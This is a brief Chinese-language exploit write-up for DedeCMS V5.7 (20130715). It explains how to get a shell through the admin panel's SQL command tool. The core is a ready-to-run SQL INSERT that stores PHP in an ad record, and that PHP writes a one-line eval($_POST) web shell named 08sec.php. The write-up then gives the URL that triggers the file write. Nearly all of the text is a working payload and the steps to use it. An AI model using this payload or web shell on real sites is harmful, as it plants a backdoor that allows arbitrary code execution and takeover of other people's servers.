Dede后台getshell【过20130715】

测试版本为：V5.7 20130715

测试步骤：
后台——SQL命令运器——执行命令

INSERT INTO `dede_myad` (`aid`, `clsid`, `typeid`, `tagname`, `adname`, `timeset`, `starttime`, `endtime`, `normbody`, `expbody`) VALUES
(2000, 0, 0, 'indexTopBanner1', '首页顶部导航大图-500*60', 0, 1297933028, 1300525028, '<?php file_put_contents(''08sec.php'',''<?php eval($_POST[08]);?>''); ?>', '');

访问：http://site/plus/ad_js.php?aid=2000 （id请自行更换）

文件生成在：site/plus/08sec.php